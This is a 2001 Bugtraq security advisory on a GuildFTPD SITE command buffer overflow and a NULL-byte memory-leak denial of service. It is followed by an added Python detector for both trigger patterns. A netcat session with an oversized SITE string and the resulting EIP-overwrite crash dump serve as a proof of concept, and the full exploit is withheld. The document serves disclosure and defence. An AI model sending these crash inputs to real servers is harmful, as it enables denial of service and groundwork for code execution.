From andreas.junestam@defcom.com Mon May 28 12:59:45 2001
From: andreas junestam
To: bugtraq@securityfocus.com
Date: Sun, 27 May 2001 21:37:06 +0100
Subject: def-2001-27: GuildFTPD Buffer Overflow and Memory Leak DoS

======================================================================
Defcom Labs Advisory def-2001-27

GuildFTPD Buffer Overflow and Memory Leak DoS

Author: Andreas Junestam
Co-Author: Janne Sarendal
Release Date: 2001-05-22
======================================================================

------------------------=[Brief Description]=-------------------------
GuildFTPD contains two different problems:

1. A buffer overrun in the SITE command that allows execution of
   arbitrary code
2. A memory leak in the input parsing code

------------------------=[Affected Systems]=--------------------------
- GuildFTPD v0.97 (probably earlier versions too)

----------------------=[Detailed Description]=------------------------
* SITE command Buffer Overflow

All the SITE commands are handled in a DLL (sitecmd.dll) which suffers
from a buffer overflow. By sending a SITE command greater than 261
bytes, a buffer will overflow and it is possible to execute arbitrary
code. We have chosen not to include the working exploit.

    C:\>nc 127.0.0.1 21
    220-GuildFTPD FTP Server (c) 1999,2000
    220-Version 0.97
    220 Please enter your name:
    user a
    331 User name okay, Need password.
    pass a
    230 User logged in.
    site AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    Access violation - code c0000005 (first chance)
    eax=01450000 ebx=00000001 ecx=00000000 edx=00130608 esi=10030000 edi=009ed9e0
    eip=41414141 esp=01bcf9b4 ebp=10030000 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206

* Memory Leak DoS

The input parsing code in GuildFTPD contains a memory leak that is
triggered by a request containing a NULL (0x0) character. GuildFTPD
will still answer new requests, but eventually the server will run out
of memory and the machine will crash.

---------------------------=[Workaround]=-----------------------------
None for the moment.

-------------------------=[Vendor Response]=--------------------------
This issue was brought to the developer's attention on the 24th of
April, 2001; there has been no response so far.

======================================================================
This release was brought to you by Defcom Labs UK
labs@defcom.com
www.defcom.com
======================================================================
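As an added example (not part of the advisory, and not GuildFTPD code), the following Python check is what a defender could run over FTP control-channel request lines to flag the two conditions described under Detailed Description: a SITE command carrying more than 261 bytes and any request containing a NULL (0x00) byte. It assumes the 261-byte figure applies to the text after the SITE verb, and it runs over a constructed sample session rather than captured traffic.

```python
# Defender-side check for the two GuildFTPD request patterns in the advisory.
# Assumption: the advisory's 261-byte limit is applied to the SITE argument
# (everything after "SITE "), measured before the trailing CRLF is counted.
SITE_ARG_LIMIT = 261  # bytes; figure taken from the advisory


def inspect_ftp_line(raw: bytes) -> list:
    """Return a list of findings for one raw FTP request line.

    The line is handled as bytes so an embedded NUL is visible; a trailing
    CRLF (or bare LF) is stripped before any length is measured.
    """
    findings = []
    line = raw.rstrip(b"\r\n")

    # Memory-leak trigger: any request with a 0x00 byte anywhere in it.
    if b"\x00" in line:
        findings.append("NUL byte in request (memory leak trigger)")

    # Overflow trigger: SITE verb (case-insensitive) with an oversized argument.
    verb, _, arg = line.partition(b" ")
    if verb.upper() == b"SITE" and len(arg) > SITE_ARG_LIMIT:
        findings.append(
            f"SITE argument {len(arg)} bytes exceeds {SITE_ARG_LIMIT} (overflow trigger)"
        )
    return findings


def scan_session(lines) -> dict:
    """Scan raw request lines in order; map line index -> findings for hits only."""
    hits = {}
    for idx, raw in enumerate(lines):
        found = inspect_ftp_line(raw)
        if found:
            hits[idx] = found
    return hits


# Constructed sample session (not captured traffic). Lines 3 and 4 reproduce
# the two request shapes the advisory describes; the rest are benign.
SAMPLE_SESSION = [
    b"USER a\r\n",
    b"PASS a\r\n",
    b"SITE HELP\r\n",
    b"site " + b"A" * 300 + b"\r\n",
    b"LIST \x00\r\n",
]

if __name__ == "__main__":
    for idx, found in scan_session(SAMPLE_SESSION).items():
        print(f"line {idx}: {'; '.join(found)}")
```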